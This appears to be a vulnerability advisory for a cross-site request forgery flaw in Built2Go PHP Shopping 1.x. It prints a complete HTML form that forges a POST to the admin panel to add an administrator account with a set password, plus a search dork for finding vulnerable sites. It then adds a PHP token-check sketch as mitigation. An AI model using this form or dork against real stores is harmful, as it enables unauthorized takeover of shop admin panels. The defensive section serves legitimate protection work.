Built2Go PHP Shopping version 1.x suffers from a cross-site request forgery vulnerability.
Built2Go PHP Shopping v 1.x – CSRF Vulnerability (add admin)
====================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.built2go.com/
.:. Dork : “Powered by Built2Go PHP Shopping”
####################################################################
===[ Exploit ]===
<html>
<body>
<form method="POST" name="form0" action="http://SITE/adminpanel/edit_admin.php">
<input type="hidden" name="userid" value="ADMIN"/>
<input type="hidden" name="pass" value="12121212"/>
<input type="hidden" name="retypepass" value="12121212"/>
<input type="hidden" name="addnew" value="1"/>
<input type="hidden" name="action" value="save"/>
<input type="hidden" name="new" value="Submit"/>
</form>
</body>
</html>
####################################################################
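===[ Mitigation example ]===
The form above is accepted because nothing in the request proves it came from the admin panel's own page. The following is an added example, not Built2Go's code and not part of the original advisory: a per-session CSRF token check placed in front of a state-changing handler such as edit_admin.php. The names csrf_token, csrf_issue() and csrf_verify() are hypothetical, and the sketch assumes PHP 7.3+ served over HTTPS.

```php
<?php
// Added example: CSRF guard for a state-changing admin form handler.
// Not Built2Go code; csrf_token, csrf_issue() and csrf_verify() are hypothetical names.
declare(strict_types=1);

// SameSite=Strict keeps the session cookie off cross-site POSTs in browsers that honour it.
// 'secure' => true assumes the admin panel is served over HTTPS.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Strict', 'secure' => true]);
session_start();

/** Return the per-session token, creating it on first use. */
function csrf_issue(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Constant-time comparison of the submitted token with the session token. */
function csrf_verify($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    // is_string() rejects array input such as csrf_token[]=x before hash_equals() sees it.
    return $expected !== '' && is_string($submitted) && hash_equals($expected, $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // A forged cross-site form can set userid/pass/addnew/action but cannot read the token.
    if (!csrf_verify($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // The application's existing handling of action=save / addnew=1 runs only past this point.
}
?>
<form method="POST" action="edit_admin.php">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_issue(), ENT_QUOTES) ?>"/>
  <!-- userid, pass, retypepass, addnew and action fields as in the application's own form -->
</form>
```

The same check belongs on every POST handler under adminpanel/ that changes state, not only the add-admin form.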